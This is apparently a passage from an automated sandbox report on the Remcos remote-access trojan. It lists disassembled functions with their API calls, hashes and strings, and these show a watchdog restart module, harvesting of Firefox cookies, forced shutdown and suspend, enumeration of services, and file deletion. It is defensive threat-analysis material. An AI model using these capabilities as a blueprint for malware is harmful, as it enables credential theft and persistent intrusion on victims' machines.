                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                                                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                                                                          • API String ID: 3018269243-13974260
                                                                                                                                                                                          • Opcode ID: 80846e9aa32d5e9ecad583fa24fef2e61b35c813560b9b1a2ed946de021dd459
                                                                                                                                                                                          • Instruction ID: caf8b4145597d1951c4f1e2719e8c994e397e7f075146ad6c9450c8f02044393
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80846e9aa32d5e9ecad583fa24fef2e61b35c813560b9b1a2ed946de021dd459
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3171923B6142405BD67AEB71CC549BE77F8AFD5301F500A6DF486A2190EF24BB09C7A2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040128D Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 101registryfiletimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(80000000,Software\Mercury32,?), ref: 004012B3
                                                                                                                                                                                          • RegQueryValueA.ADVAPI32(?,BaseDir,?,?), ref: 004012DA
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004012E6
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004012F3
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 0040133C
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?), ref: 00401347
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00401392
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$Find$FileFirstLocalOpenQueryTimeValue
                                                                                                                                                                                          • String ID: %02d-%02d-%02d.%02d%02d: %s$%s\Loader.Log$BaseDir$Software\Mercury32$r+t
                                                                                                                                                                                          • API String ID: 3460814986-3360229980
                                                                                                                                                                                          • Opcode ID: d42e11aa60fbf32dd4a069eacb1d90151598f08982d27fe23f8b733977c3bb31
                                                                                                                                                                                          • Instruction ID: dfd861be5d27ab76580011db74593427ab2e3e9b6d1f87f4f499b649e2b96ce4
                                                                                                                                                                                          • Opcode Fuzzy Hash: d42e11aa60fbf32dd4a069eacb1d90151598f08982d27fe23f8b733977c3bb31
                                                                                                                                                                                          • Instruction Fuzzy Hash: C231A9B1D00218A6DB2197A1DC42FEE727C9B58704F1005BFBA45B11D2EBBC9B8497AC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401612 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 199registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(80000000,?,?), ref: 0040163A
                                                                                                                                                                                          • RegQueryValueA.ADVAPI32(?,?,?,00000100), ref: 00401666
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000100,80000000,?,?), ref: 0040167F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID: Sun
                                                                                                                                                                                          • API String ID: 3677997916-1777960983
                                                                                                                                                                                          • Opcode ID: 7ff23931f9180ebd065799e6ebba2e26a881ec2f15493c3a157dd0b93333aae2
                                                                                                                                                                                          • Instruction ID: a1372a7988ff15dddaec5151edecfe8a6d2af13598d18863dde0c3b66d26f21d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ff23931f9180ebd065799e6ebba2e26a881ec2f15493c3a157dd0b93333aae2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E618DB79002196AD755D761CC41EEBB37CEF48304F0445ABB649B2091EB785BD48FE8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123432D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 12343417
                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 12343425
                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 12343432
                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 12343452
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 1234345F
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 12343465
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 297527592-0
                                                                                                                                                                                          • Opcode ID: 6d2f60fa608976eb432555445adae6e36b4f98b6222c7cf6ec10d3f135070d4d
                                                                                                                                                                                          • Instruction ID: 1741bed1f8e5d04286adcb3823877cfacf3b6be66590ec1b5b850be7a463a1cd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d2f60fa608976eb432555445adae6e36b4f98b6222c7cf6ec10d3f135070d4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E41C373248251BBD7219B65DC89F6B7AECEFC5768F300A19F658DA190EE30D500CA62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12349627 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                                                          • API String ID: 0-3177665633
                                                                                                                                                                                          • Opcode ID: 401f5f3d2bfbf4705654e8bf53b8f20f95d9d126d85cd321d15299b92ac01670
                                                                                                                                                                                          • Instruction ID: 59483818b5f760f7e2e3d04f538446bdc99ca28c0bc00dae34ebd6b4643a217a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 401f5f3d2bfbf4705654e8bf53b8f20f95d9d126d85cd321d15299b92ac01670
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8671D1769483429FD725CF20E854BAABBD49F88310F104A5DF592572E0DF74BB09C792
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,123A58E8), ref: 1234A75E
                                                                                                                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 1234A7AD
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 1234A7BB
                                                                                                                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 1234A7F3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3587775597-0
                                                                                                                                                                                          • Opcode ID: d601eb24ad070c104b7f5b59712a0ed285fe31f546d31787d81b132d7a071b59
                                                                                                                                                                                          • Instruction ID: 021211ebcfe7c1384cb7d46c870f97f03e111b20688962dd009977c4363d59db
                                                                                                                                                                                          • Opcode Fuzzy Hash: d601eb24ad070c104b7f5b59712a0ed285fe31f546d31787d81b132d7a071b59
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B813976508344ABC366DB60C8949AFB7ECFF94305F504A1EF58696250EF34BB09CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 1233C39B
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 1233C46E
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 1233C47D
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 1233C4A8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                          • API String ID: 1164774033-405221262
                                                                                                                                                                                          • Opcode ID: ca2aed4c5c61f779917124222abfc8545091ed4c566a9830fdf2c145cc8bf5b7
                                                                                                                                                                                          • Instruction ID: 132cb4dd459a79dd594a354501db79298f42dd2c0d49f9079f6b20a458fb2cde
                                                                                                                                                                                          • Opcode Fuzzy Hash: ca2aed4c5c61f779917124222abfc8545091ed4c566a9830fdf2c145cc8bf5b7
                                                                                                                                                                                          • Instruction Fuzzy Hash: D23184379442196ADB66E7B0DC98DFD777CAF51712F004619E00AA2180EF34AB4ACB44
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C2EC
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C31C
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C38E
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C39B
                                                                                                                                                                                            • Part of subcall function 1234C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C371
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C3BC
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C3D2
                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C3D9
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,123A52D8,123A52F0,00000001), ref: 1234C3E2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2341273852-0
                                                                                                                                                                                          • Opcode ID: b5e84df84747b4cb0ef23989db8eabd920382d80f099c36830e3839410ea0c3a
                                                                                                                                                                                          • Instruction ID: 75d77fd3a9efb1ae3a8786363304ab31af59e837517fc8ae3c7f115549e8414c
                                                                                                                                                                                          • Opcode Fuzzy Hash: b5e84df84747b4cb0ef23989db8eabd920382d80f099c36830e3839410ea0c3a
                                                                                                                                                                                          • Instruction Fuzzy Hash: E031A57790026C5BDB20DAA0CC88EEB73FCAF44208F600AE5E559E2141EF35EB84CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12339253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 12339258
                                                                                                                                                                                            • Part of subcall function 123348C8: connect.WS2_32(FFFFFFFF,124892B8,00000010), ref: 123348E0
                                                                                                                                                                                            • Part of subcall function 12334AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 12334B36
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 123392F4
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 12339352
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 123393AA
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 123393C1
                                                                                                                                                                                            • Part of subcall function 12334E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,123A4EF8,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E38
                                                                                                                                                                                            • Part of subcall function 12334E26: SetEvent.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E43
                                                                                                                                                                                            • Part of subcall function 12334E26: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E4C
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 123395B9
                                                                                                                                                                                            • Part of subcall function 12334AA1: WaitForSingleObject.KERNEL32(00000000,00000000,1233547D,?,?,00000004,?,?,00000004,?,123A4EF8,?), ref: 12334B47
                                                                                                                                                                                            • Part of subcall function 12334AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,123A4EF8,?,?,?,?,?,?,1233547D), ref: 12334B75
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2435342581-0
                                                                                                                                                                                          • Opcode ID: 5d3b9b36eab660c66e910d58e15e83cfa1c9a532d08c2f9533922f02b5c6a4e4
                                                                                                                                                                                          • Instruction ID: 5048a4a49422a16a7020710881e21b3bec16346f301fe5bfcf30178c92ed150f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d3b9b36eab660c66e910d58e15e83cfa1c9a532d08c2f9533922f02b5c6a4e4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B17D779001199BDB66EBA0DC91EFDB779AF04312F104259E50AA7194EF30BF49CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123467B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12347952: GetCurrentProcess.KERNEL32(00000028,?), ref: 1234795F
                                                                                                                                                                                            • Part of subcall function 12347952: OpenProcessToken.ADVAPI32(00000000), ref: 12347966
                                                                                                                                                                                            • Part of subcall function 12347952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 12347978
                                                                                                                                                                                            • Part of subcall function 12347952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 12347997
                                                                                                                                                                                            • Part of subcall function 12347952: GetLastError.KERNEL32 ref: 1234799D
                                                                                                                                                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 12346856
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 1234686B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 12346872
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                          • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                          • API String ID: 1589313981-1420736420
                                                                                                                                                                                          • Opcode ID: 0ed498153ba48b2de706069ac15bd8f5fee963728e51322e90729d17ffc79115
                                                                                                                                                                                          • Instruction ID: ba2866dd8b4eb1f2d4f20783c9fab8d367ee2e91878c028fc8a75eea8f08bb17
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ed498153ba48b2de706069ac15bd8f5fee963728e51322e90729d17ffc79115
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E21B6BB6143459FCEA6EFB0CC94ABE23EE5F41B41F400C58A081971C1EE65AA05CF61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12339665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 1233966A
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 123396E2
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 1233970B
                                                                                                                                                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 12339722
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1157919129-0
                                                                                                                                                                                          • Opcode ID: c31f7233d6e1fd9e281532df9908bceae4bcfbfd7913f71989f785548abc573d
                                                                                                                                                                                          • Instruction ID: 7aaf324911104d3e3dc94779c5cea0805b8d614938c15b1e043c6328a045ed05
                                                                                                                                                                                          • Opcode Fuzzy Hash: c31f7233d6e1fd9e281532df9908bceae4bcfbfd7913f71989f785548abc573d
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7811977800119DBCB66DBA0DC909FDB7B8BF14316F10466AE446A71A0EF34AB49CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12382610 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12378215: GetLastError.KERNEL32(00000020,?,1236A7F5,?,?,?,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B), ref: 12378219
                                                                                                                                                                                            • Part of subcall function 12378215: _free.LIBCMT ref: 1237824C
                                                                                                                                                                                            • Part of subcall function 12378215: SetLastError.KERNEL32(00000000,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B,?,00000041,00000000,00000000), ref: 1237828D
                                                                                                                                                                                            • Part of subcall function 12378215: _abort.LIBCMT ref: 12378293
                                                                                                                                                                                            • Part of subcall function 12378215: _free.LIBCMT ref: 12378274
                                                                                                                                                                                            • Part of subcall function 12378215: SetLastError.KERNEL32(00000000,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B,?,00000041,00000000,00000000), ref: 12378281
                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 1238271C
                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 12382777
                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 12382786
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,12374A6C,00000040,?,12374B8C,00000055,00000000,?,?,00000055,00000000), ref: 123827CE
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,12374AEC,00000040), ref: 123827ED
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 745075371-0
                                                                                                                                                                                          • Opcode ID: 3eb1958f35ce890f68ff7277d1eb0fdcb824e3b362a248c121e1a2b5a7bdb3d9
                                                                                                                                                                                          • Instruction ID: f6582d83a222f21d24fd63777f280ad3a7a7b0e21e11e3a7fdc468ed8f3b9210
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3eb1958f35ce890f68ff7277d1eb0fdcb824e3b362a248c121e1a2b5a7bdb3d9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 35517E77900259ABEF10DBA5CC84EFAB7B8AF58700F414769E954EF191E770AA00CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14644AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,14644A8A,?,14652238,0000000C,14644BBD,00000000,00000000,00000001,14642082,14652108,0000000C,14641F3A,?), ref: 14644AD5
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,14644A8A,?,14652238,0000000C,14644BBD,00000000,00000000,00000001,14642082,14652108,0000000C,14641F3A,?), ref: 14644ADC
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 14644AEE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                          • String ID:
